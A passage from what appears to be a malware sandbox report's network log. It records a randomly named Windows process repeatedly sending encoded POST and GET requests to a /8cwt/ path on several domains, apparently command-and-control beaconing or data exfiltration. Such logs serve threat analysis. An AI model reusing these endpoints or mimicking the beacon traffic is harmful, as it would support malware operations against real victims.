                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:15:36.539907932 CEST | 1289 | IN | HTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:14:59 GMT
                                      Content-Type: text/html;charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      X-Powered-By: PHP/5.4.41
                                      Data Ascii: 48c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title></title><script src="/jquery.min.js" ></script></head><body><h1><a href="/" title=''></a></h1><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache Server at www.meas-elec.com Port 80</address><div style="clear:both;padding:10px;text-align:center;margin:5"><a href="/airportsurvery.com.xml" target="_blank">XML </a> | <a href="/airportsurvery.com.html" target="_blank">Sitemap </a></div><script> (function(){var bp = document.createElement('script');var curProtocol = window.location.protocol.split(':')[0];if (curProtocol === 'https') {bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';}else{bp.src = ' [TRUNCATED]
                                      Jun 4, 2024 14:15:36.539975882 CEST    93                   IN
                                      Data Ascii: yTagName("script")[0];s.parentNode.insertBefore(bp, s); })(); </script></body></html>0


                                      Session ID    Source IP        Source Port    Destination IP    Destination Port    PID     Process
                                      5             192.168.11.30    49851          203.161.49.193    80                  2980    C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp                              Bytes transferred    Direction    Data
                                      Jun 4, 2024 14:15:41.927440882 CEST    692                  OUT          POST /8cwt/ HTTP/1.1
                                      Host: www.innovtech.life
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.innovtech.life
                                      Referer: http://www.innovtech.life/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=fQBmmYz6qvK+Df7e1oZBiBxqcJzczsT97uC9AR5ugLcnOOuqquvzqVbbrW0o0NvIe025nx9EjDbswrTs++QIHPIiDKfI97I/04KsjAMUN5GdLcourF3WeKC6w6Yk/Cwvnf4dYr0Xd5pvjLS/Jtw+INHAt94UFRkzVBZPnkIf4fFIYv3G4ncoCpW0gxKX3CQ0kA==
                                      Jun 4, 2024 14:15:42.108845949 CEST    533                  IN           HTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:15:42 GMT
                                      Server: Apache
                                      Content-Length: 389
                                      Connection: close
                                      Content-Type: text/html
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session ID    Source IP        Source Port    Destination IP    Destination Port    PID     Process
                                      6             192.168.11.30    49852          203.161.49.193    80                  2980    C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp                              Bytes transferred    Direction    Data
                                      Jun 4, 2024 14:15:44.628499031 CEST    712                  OUT          POST /8cwt/ HTTP/1.1
                                      Host: www.innovtech.life
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.innovtech.life
                                      Referer: http://www.innovtech.life/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=fQBmmYz6qvK+C+LezPtB3Rx1Qpzcm8TD7ue9AQ9Hh44nOveq4sHztVbbl20twNvBe06fn19EjDPswqjs+t4LFfIgWafKwbI/04KsjBo6N9SdLtYuqhjZFqC55aYksSwjnf54Yq5Md7BvjO2/J/YhTdHCwN5GM0RNVDY92WYl/eZ9d4GclkoqRJqZ8wn/1ARv5MDR+oTogwORrkVGqc/PxcM=
                                      Jun 4, 2024 14:15:44.811589956 CEST    533                  IN           HTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:15:44 GMT
                                      Server: Apache
                                      Content-Length: 389
                                      Connection: close
                                      Content-Type: text/html
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session ID    Source IP        Source Port    Destination IP    Destination Port    PID     Process
                                      7             192.168.11.30    49853          203.161.49.193    80                  2980    C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp                              Bytes transferred    Direction    Data
                                      Jun 4, 2024 14:15:47.339118958 CEST    1629                 OUT          POST /8cwt/ HTTP/1.1
                                      Host: www.innovtech.life
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.innovtech.life
                                      Referer: http://www.innovtech.life/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX= [TRUNCATED]
                                      Jun 4, 2024 14:15:47.530402899 CEST    533                  IN           HTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:15:47 GMT
                                      Server: Apache
                                      Content-Length: 389
                                      Connection: close
                                      Content-Type: text/html
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session ID    Source IP        Source Port    Destination IP    Destination Port    PID     Process
                                      8             192.168.11.30    49854          203.161.49.193    80                  2980    C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp                              Bytes transferred    Direction    Data
                                      Jun 4, 2024 14:15:50.046983957 CEST    429                  OUT          GET /8cwt/?24eluX=SSpGlvD+1syJM+fS7Z8C1Cd2ZLeBmOr+68qPZxMelqgcCM6DsfmVmmLjkXM2/P+9S0q4oxoduwfupYzMqMwdcdYcBeP38sFbk5TUrAJPEOGdI/gD7BvPJp4=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.innovtech.life
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:15:50.239666939 CEST    548                  IN           HTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:15:50 GMT
                                      Server: Apache
                                      Content-Length: 389
                                      Connection: close
                                      Content-Type: text/html; charset=utf-8
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session ID    Source IP        Source Port    Destination IP    Destination Port    PID     Process
                                      9             192.168.11.30    49855          91.195.240.123    80                  2980    C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp                              Bytes transferred    Direction    Data
                                      Jun 4, 2024 14:15:55.670871973 CEST    674                  OUT          POST /8cwt/ HTTP/1.1
                                      Host: www.k4ryd.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.k4ryd.us
                                      Referer: http://www.k4ryd.us/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=9LLMoauWOkuQL/qjNZU+iA1k6M3dI+E6eIBxE4bRbgLk94XG7i+QWU+7qTPk/LmJFUydEvazl1sN+2xc7gsuY9Rzj23GGhbz5eBqzDLrpJq7DfazVbM0fv9epU0L47xl18hk8dnM1xN3Hp9UAMr0yq7DaEebqXFLlutB8qdt3ixpaAG6Y+RVWhMGiGmc2GBuYA==
                                      Jun 4, 2024 14:15:55.897732019 CEST    208                  IN           HTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session ID    Source IP        Source Port    Destination IP    Destination Port    PID     Process
                                      10            192.168.11.30    49856          91.195.240.123    80                  2980    C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp                              Bytes transferred    Direction    Data
                                      Jun 4, 2024 14:15:58.423022032 CEST    694                  OUT          POST /8cwt/ HTTP/1.1
                                      Host: www.k4ryd.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.k4ryd.us
                                      Referer: http://www.k4ryd.us/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=9LLMoauWOkuQKcCjM6s+kg1n/M3dHeEAeIdxE8CWbWzk9ZnG0AWQY0+7zjPbwrmSFU/gEvmzl1oN+2hc6XwvJ9R1qW3EIBbz5eBqzDPNpJy7DPKzW6MrB/9Bh00L87xh18hW8ZHq10J3HtxUA+D34q7BE0f+5HRFkuJdypA05CdLS33gF9lXFBwr+HL00EA1FDFmEjpfuNiVFoTgOmX5fDE=
                                      Jun 4, 2024 14:15:58.654165030 CEST    208                  IN           HTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session ID    Source IP        Source Port    Destination IP    Destination Port    PID     Process
                                      11            192.168.11.30    49857          91.195.240.123    80                  2980    C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp                              Bytes transferred    Direction    Data
                                      Jun 4, 2024 14:16:01.185097933 CEST    1611                 OUT          POST /8cwt/ HTTP/1.1
                                      Host: www.k4ryd.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.k4ryd.us
                                      Referer: http://www.k4ryd.us/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX= [TRUNCATED]
                                      Jun 4, 2024 14:16:01.412623882 CEST    208                  IN           HTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session ID    Source IP        Source Port    Destination IP    Destination Port    PID     Process
                                      12            192.168.11.30    49858          91.195.240.123    80                  2980    C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp                              Bytes transferred    Direction    Data
                                      Jun 4, 2024 14:16:03.932521105 CEST    423                  OUT          GET /8cwt/?24eluX=wJjsrv+xTFW5EezvLu5DoT5e4On1D8g+dr15EOXITWTD1anv0RLrfGS01TvW8pCuGmfcOvvelUpztksk4WpfZfFxijTtARXG8NIL7Taa8Kq3eoSsUv86NcY=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.k4ryd.us
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:16:04.157922983 CEST    208                  IN           HTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session ID    Source IP        Source Port    Destination IP    Destination Port    PID     Process
                                      13            192.168.11.30    49860          66.81.203.196     80                  2980    C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp                              Bytes transferred    Direction    Data
                                      Jun 4, 2024 14:17:43.404165983 CEST    707                  OUT          POST /8cwt/ HTTP/1.1
                                      Host: www.accentbathrooms.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.accentbathrooms.com
                                      Referer: http://www.accentbathrooms.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=47y8yc2UpsMBVvmAjvScewI6ndyc2BJByfn0U56sJNZR8mlo5LPmBRgDGBCzra79lz59O7VI8bskWorCLt/HeJ8mdRg2RPqTN4eo5bDGLxNP0+9jA5U1uYGQxYTf4p37quIElyuqOEi5iWPT5Ro4+HJdfE+O9mG1mtKFT07JA4UE2sY1jLYkxfALJn/xV5C1aw==
                                      Jun 4, 2024 14:17:43.562356949 CEST    380                  IN           HTTP/1.1 403 Forbidden
                                      Server: nginx/1.14.2
                                      Date: Tue, 04 Jun 2024 12:17:43 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip


                                      Session ID    Source IP        Source Port    Destination IP    Destination Port    PID     Process
                                      14            192.168.11.30    49861          66.81.203.196     80                  2980    C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp                              Bytes transferred    Direction    Data
                                      Jun 4, 2024 14:17:46.092276096 CEST    727                  OUT          POST /8cwt/ HTTP/1.1
                                      Host: www.accentbathrooms.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.accentbathrooms.com
                                      Referer: http://www.accentbathrooms.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:17:46.250518084 CEST | 380 | IN | HTTP/1.1 403 Forbidden
                                      Server: nginx/1.14.2
                                      Date: Tue, 04 Jun 2024 12:17:46 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      15 | 192.168.11.30 | 49862 | 66.81.203.196 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:17:48.780070066 CEST | 1644 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.accentbathrooms.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.accentbathrooms.com
                                      Referer: http://www.accentbathrooms.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:17:48.938534021 CEST | 380 | IN | HTTP/1.1 403 Forbidden
                                      Server: nginx/1.14.2
                                      Date: Tue, 04 Jun 2024 12:17:48 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      16 | 192.168.11.30 | 49863 | 66.81.203.196 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:17:51.469299078 CEST | 434 | OUT | GET /8cwt/?24eluX=15acxp6jrOd/buvS9YLoVCwQt/eIj0wV8tP3YL3PMsIjyFVitYjgFC8LDxGQh6T0kTJLIrMUzadAXsDAGdfiNfgPYx4xbqKJILHq2u+5CghFrM1CdZcxiKw=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.accentbathrooms.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:17:51.630954027 CEST | 721 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.14.2
                                      Date: Tue, 04 Jun 2024 12:17:51 GMT
                                      Content-Type: text/html
                                      Content-Length: 571
                                      Connection: close
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      17 | 192.168.11.30 | 49864 | 162.43.104.164 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:18:02.482475996 CEST | 701 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.shun-yamagata.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.shun-yamagata.com
                                      Referer: http://www.shun-yamagata.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:18:02.757194042 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:18:01 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT
                                      ETag: W/"afe-6014d9a904f4f"
                                      Content-Encoding: gzip
                                      Jun 4, 2024 14:18:02.757206917 CEST | 300 | IN


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      18 | 192.168.11.30 | 49865 | 162.43.104.164 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:18:05.285547972 CEST | 721 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.shun-yamagata.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.shun-yamagata.com
                                      Referer: http://www.shun-yamagata.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:18:05.562218904 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:18:04 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT
                                      ETag: W/"afe-6014d9a904f4f"
                                      Content-Encoding: gzip
                                      Jun 4, 2024 14:18:05.562242031 CEST | 300 | IN


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      19 | 192.168.11.30 | 49866 | 162.43.104.164 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:18:08.121305943 CEST | 1638 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.shun-yamagata.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.shun-yamagata.com
                                      Referer: http://www.shun-yamagata.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:18:08.420351028 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:18:06 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT
                                      ETag: W/"afe-6014d9a904f4f"
                                      Content-Encoding: gzip
                                      Jun 4, 2024 14:18:08.420361996 CEST | 300 | IN


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      20 | 192.168.11.30 | 49867 | 162.43.104.164 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:18:10.959743023 CEST | 432 | OUT | GET /8cwt/?24eluX=l+yNdBmIbZk94DyhKMCQgPu5et7F5Fjr+MUK0mOzdhwjPjmD5w+n15/KVowCPgtS4Y9yjKxUIxHTxuQuQfpR6KughRwQexCRaaEyjIZ4vPoy+iMgbgX/vtU=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.shun-yamagata.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:18:11.269223928 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:18:09 GMT
                                      Content-Type: text/html
                                      Content-Length: 2814
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT
                                      ETag: "afe-6014d9a904f4f"
                                      Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>404 File Not Found</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14px; margin: 0; [TRUNCATED]
                                      Jun 4, 2024 14:18:11.269238949 CEST | 1289 | IN
                                      Jun 4, 2024 14:18:11.269294977 CEST | 476 | IN


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      21 | 192.168.11.30 | 49868 | 93.125.99.134 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:18:26.097327948 CEST | 680 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.brongal.by
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.brongal.by
                                      Referer: http://www.brongal.by/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:18:26.778142929 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:18:26 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      x-powered-by: PHP/7.4.33
                                      x-litespeed-tag: 2cc_HTTP.404
                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      cache-control: no-cache, must-revalidate, max-age=0
                                      link: <https://brongal.by/wp-json/>; rel="https://api.w.org/"
                                      x-litespeed-cache-control: no-cache
                                      content-encoding: gzip
                                      vary: Accept-Encoding
                                      x-turbo-charged-by: LiteSpeed


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      22 | 192.168.11.30 | 49869 | 93.125.99.134 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:18:28.874996901 CEST | 700 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.brongal.by
